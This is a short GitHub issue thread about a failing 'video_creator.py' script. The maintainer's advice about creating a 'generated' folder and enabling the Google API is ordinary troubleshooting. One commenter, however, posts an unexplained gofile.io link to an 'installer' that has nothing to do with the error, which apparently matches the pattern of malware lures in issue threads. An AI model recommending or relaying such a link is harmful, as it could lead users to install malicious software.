### ISSUE TITLE
The command python video_creator.py doesn't work 

### ISSUE THREAD

**Issue by Rantanplan010** [jh991205/Youtube-Shorts-Maker#1]
When inputting the script command, the following error is displayed : no such file or directory. Am I missing something or do I need to input Python video_creator_script.py, when I do, the error comes from a missing client ID despite having modified the .env and the raw metadata file, one after the other and still getting the same error.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by jh991205** [comment]
I suspect it's because you have to create a `generated` folder in the root directory, lemme know if that works for you. If not, please copy paste the complete error so I can take a look and try to replicate it.

**Comment by jh991205** [comment]
I updated the script now so that it will create a generated folder automatically for you. You will also need to enable Google API for automatic uploads.

**Comment by Rantanplan010** [comment]
thanks for your help, I'll try that
